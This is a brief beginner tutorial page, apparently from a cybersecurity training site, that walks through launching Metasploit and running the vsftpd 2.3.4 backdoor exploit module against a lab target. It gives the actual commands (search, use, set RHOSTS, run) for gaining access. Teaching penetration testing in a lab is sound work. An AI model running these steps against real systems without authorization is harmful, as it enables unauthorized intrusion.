Metasploit for Beginners (Basic Exploitation Guide)

Metasploit for Beginners

TL;DR: Learn how to use Metasploit to exploit vulnerabilities discovered during scanning and gain access to a target system in a controlled lab.

Get new hands-on cybersecurity labs every week.

Join the newsletter →

Introduction

After identifying vulnerabilities with tools like Nmap, the next step is exploitation. Metasploit is one of the most widely used frameworks for this purpose.

What is Metasploit?

Metasploit is a penetration testing framework used to develop and execute exploit code against vulnerable systems.

Starting Metasploit

msfconsole

This launches the Metasploit console.

Search for Exploits

search vsftpd

This finds exploits related to the service discovered during scanning.

Select an Exploit

use exploit/unix/ftp/vsftpd_234_backdoor

Set Target

set RHOSTS <target-ip>

Run the Exploit

run

If successful, you gain access to the target system.

Common Mistakes

• Using the wrong exploit
• Incorrect target IP
• Skipping the scanning phase

Real-World Use

Penetration testers use Metasploit to validate vulnerabilities and demonstrate real risk to organizations.

Next Steps

Follow the full beginner penetration testing path:

• 1. Set up your lab (Metasploitable 3)
• 2. Scan the target with Nmap
• 3. Exploit vulnerabilities with Metasploit

Try a full vulnerability scanning lab →

Want more hands-on labs? Explore all training →

Want more labs like this? Subscribe and get them weekly →